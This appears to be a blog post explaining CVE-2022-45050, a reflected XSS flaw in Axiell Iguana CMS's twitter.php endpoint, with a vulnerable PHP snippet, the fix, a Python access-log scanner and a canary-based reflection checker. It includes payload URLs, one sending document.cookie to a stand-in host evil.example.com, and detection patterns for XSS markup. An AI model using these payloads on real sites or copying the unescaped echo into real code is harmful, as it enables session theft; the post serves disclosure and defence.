CVE-2022-45050 is a reflected Cross-Site Scripting (XSS) vulnerability in Axiell Iguana CMS, a content management system used by libraries. The bug sits in the way the application handles the title parameter of the twitter.php endpoint: the value is written back into the response without output encoding. In this post, we'll break down how this bug works, why it's dangerous, and how an attacker could exploit it to run JavaScript of their choosing in a victim's browser. We'll also provide simple code examples and reference links for further reading.
What Is CVE-2022-45050?
Axiell Iguana CMS is used by libraries and organizations around the world to manage and present online content. The title parameter of the twitter.php endpoint, however, is reflected into the HTML response without being encoded or otherwise neutralized.
This makes the endpoint vulnerable to reflected XSS. If an attacker can trick a user into opening a crafted link, the attacker's JavaScript executes in the victim's browser under the site's origin, with access to the page and to whatever the victim's session can do.
Why Does This Happen?
When a web application echoes user input back into a page without escaping it, any markup in that input is parsed by the browser and any script in it runs in the context of the user viewing the page. This is the basis of reflected XSS, which can be used to perform actions as the victim: read page content, send requests that carry the victim's session, and read any cookies not flagged HttpOnly.
In Iguana CMS, the lack of output encoding on the title query parameter means that whatever a user supplies in this parameter is written directly into the page's HTML.
Suppose the vulnerable link looks like this:
https://example.com/twitter.php?title=Hello%20World
Whatever follows title= is URL-decoded by PHP and reflected into the response. If an attacker replaces Hello%20World with an XSS payload, the browser parses the payload as part of the page and executes it.
Malicious Example
https://example.com/twitter.php?title=<script>alert('XSS!')</script>
Below is a hypothetical, simplified snippet of the vulnerable part of twitter.php (the real file is not reproduced here; this is the pattern the bug follows):
<?php
// $_GET['title'] has already been URL-decoded by PHP, so %3Cscript%3E arrives as <script>.
// It is concatenated straight into the HTML body without htmlspecialchars() or any other encoding.
echo "<h1>" . $_GET['title'] . "</h1>";
?>
If a user visits a link whose title contains a script tag, the tag lands in the page as-is and the script runs.
Open the following example URL against a test instance (DO NOT DO THIS ON A PRODUCTION SYSTEM!):
https://example.com/twitter.php?title=<script>alert('Pwned by XSS')</script>
You should see a JavaScript alert box if the site is vulnerable. The browser percent-encodes the angle brackets when it sends the request; PHP decodes them again before the echo, so the payload arrives intact.
A more dangerous payload would exfiltrate data instead of popping an alert:
https://example.com/twitter.php?title=<script>fetch('https://evil.example.com/?cookie='+document.cookie)</script>
This sends the victim's cookies to a server the attacker controls. The request is delivered even though the attacker's origin is cross-site: CORS only stops the page from reading the response, not from sending the GET. Two caveats apply. document.cookie only exposes cookies that lack the HttpOnly flag, so a session cookie set with HttpOnly would not be included; and a Content-Security-Policy with a restrictive connect-src would block the fetch, though not the injection itself.
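For defenders, the exploitation attempts above leave a recognisable trace in web server access logs: a request to twitter.php whose title value, once URL-decoded the way PHP decodes it, contains markup. The following is an added example (not from the original post and not Axiell's code) that scans combined-format access log lines for such requests. The log lines are constructed for the example, the path match on twitter.php assumes the endpoint may live under an install prefix, and the markup regex is a deliberately simple heuristic, not a complete XSS grammar.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
# Line 2 and 3 are exploitation attempts; line 4 is double-encoded and will NOT
# execute, because PHP decodes the query string only once; line 5 hits another endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Dec/2022:10:00:01 +0000] "GET /twitter.php?title=Hello%20World HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Dec/2022:10:00:07 +0000] "GET /twitter.php?title=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 540 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Dec/2022:10:00:12 +0000] "GET /twitter.php?title=%3Cimg%20src%3Dx%20onerror%3Dfetch('https://evil.example.com/?c='%2Bdocument.cookie)%3E HTTP/1.1" 200 600 "-" "curl/7.81"
203.0.113.9 - - [01/Dec/2022:10:00:20 +0000] "GET /twitter.php?title=%253Cscript%253E HTTP/1.1" 200 530 "-" "curl/7.81"
198.51.100.2 - - [01/Dec/2022:10:01:00 +0000] "GET /index.php?title=%3Cscript%3E HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

# Combined log format: client ip, identity, user, [timestamp], "METHOD target PROTO", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Heuristic markers for HTML/JS injection in a body context: a tag that can carry
# script, a javascript: URL, or an inline event handler attribute.
XSS_RE = re.compile(
    r"<\s*(script|img|svg|iframe|object|embed)\b|javascript\s*:|\bon[a-z]+\s*=",
    re.IGNORECASE,
)


def extract_title(target: str):
    """Return the decoded title parameter for requests to twitter.php, else None.

    parse_qs percent-decodes exactly once, matching what PHP's $_GET sees.
    The endswith() check is an assumption that Iguana may be installed under a prefix.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/twitter.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("title")
    return values[0] if values else None


def find_xss_attempts(log_text: str) -> list[dict]:
    """Scan log lines and return those whose decoded title looks like markup injection."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        title = extract_title(m.group("target"))
        if title is None:
            continue
        if XSS_RE.search(title):
            hits.append(
                {
                    "ip": m.group("ip"),
                    "ts": m.group("ts"),
                    "status": m.group("status"),
                    "title": title,
                }
            )
    return hits


if __name__ == "__main__":
    for hit in find_xss_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} title={hit['title']!r}")
```

Run against a real log with find_xss_attempts(open(path).read()); a status of 200 on a flagged line means the payload was served, which is the case to triage first. The double-encoded line is intentionally not flagged because it is not executable on this endpoint, but a run of such requests from one client is still worth looking at as probing.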
Example Fix
<?php
// Encode the value for an HTML body context. ENT_QUOTES also encodes ' and " so the
// same helper is safe inside a quoted attribute value.
echo "<h1>" . htmlspecialchars($_GET['title'], ENT_QUOTES, 'UTF-8') . "</h1>";
?>
htmlspecialchars is the right tool for HTML body and quoted-attribute contexts. If the value is instead placed inside a script block, a URL, or an unquoted attribute, a different encoder for that context is needed. A Content-Security-Policy header that disallows inline scripts is a worthwhile second layer, but it is defense in depth, not a substitute for encoding the output.
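To make the "does the alert fire" check above reproducible without a browser, and to show what the fix changes in the output, here is an added example (not from the original post and not Axiell's code). It emulates both the vulnerable and the fixed PHP in Python, an assumption standing in for the real twitter.php, and probes each with a random canary the way a scanner would: the canary is reflected with its angle brackets intact only when encoding is missing.

```python
import html
import secrets

# The alert payload from the post, used to compare the two renderings.
PAYLOAD = "<script>alert('XSS!')</script>"


def render_vulnerable(title: str) -> str:
    """Emulates the vulnerable PHP: the parameter is concatenated into the HTML body."""
    return "<h1>" + title + "</h1>"


def render_fixed(title: str) -> str:
    """Emulates the fix. html.escape(quote=True) encodes & < > " and ', as
    htmlspecialchars($s, ENT_QUOTES, 'UTF-8') does (PHP emits &#039; for ',
    Python emits &#x27;; both are inert)."""
    return "<h1>" + html.escape(title, quote=True) + "</h1>"


def make_canary(token: str = "") -> tuple:
    """Return (token, probe). The probe wraps a random token in angle brackets so the
    result is a harmless unknown element, never a real script. The bare token is what
    we search for, so a reflection that was encoded or stripped can still be located."""
    token = token or "c" + secrets.token_hex(4)
    return token, "<" + token + ">"


def classify_reflection(body: str, token: str, probe: str) -> str:
    """unencoded: angle brackets survived, exploitable in an HTML body context.
    encoded:   the value came back but < and > were neutralised (or stripped).
    absent:    the parameter is not reflected at all."""
    if probe in body:
        return "unencoded"
    if token in body:
        return "encoded"
    return "absent"


def check(render) -> str:
    """Probe one rendering function with a fresh canary and classify the response."""
    token, probe = make_canary()
    return classify_reflection(render(probe), token, probe)


if __name__ == "__main__":
    print("vulnerable:", check(render_vulnerable))
    print("fixed:     ", check(render_fixed))
    print(render_vulnerable(PAYLOAD))
    print(render_fixed(PAYLOAD))
```

Against a live test instance, the same classify_reflection() call is applied to the response body of a request whose title parameter is the probe string; an "unencoded" result on a twitter.php response is the signal that the system is unpatched, with no alert box needed.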
References and More Reading
- CVE Details Record for CVE-2022-45050
- Exploit Database – XSS Reflected Attacks
- OWASP: Cross-site Scripting (XSS)
- Axiell Iguana official site
Conclusion
CVE-2022-45050 in Axiell Iguana CMS shows that even widely used software can have basic, easy-to-exploit vulnerabilities. Reflected XSS issues like this are preventable with context-aware output encoding applied consistently wherever user-controlled data is written into a page. Website administrators should apply the vendor's fix promptly, and developers should ensure user data is never echoed into a page without proper escaping.
Stay vigilant: one overlooked line of code can become an attacker’s best friend.
Timeline
Published on: 12/01/2022 09:15:00 UTC
Last modified on: 01/09/2023 17:12:00 UTC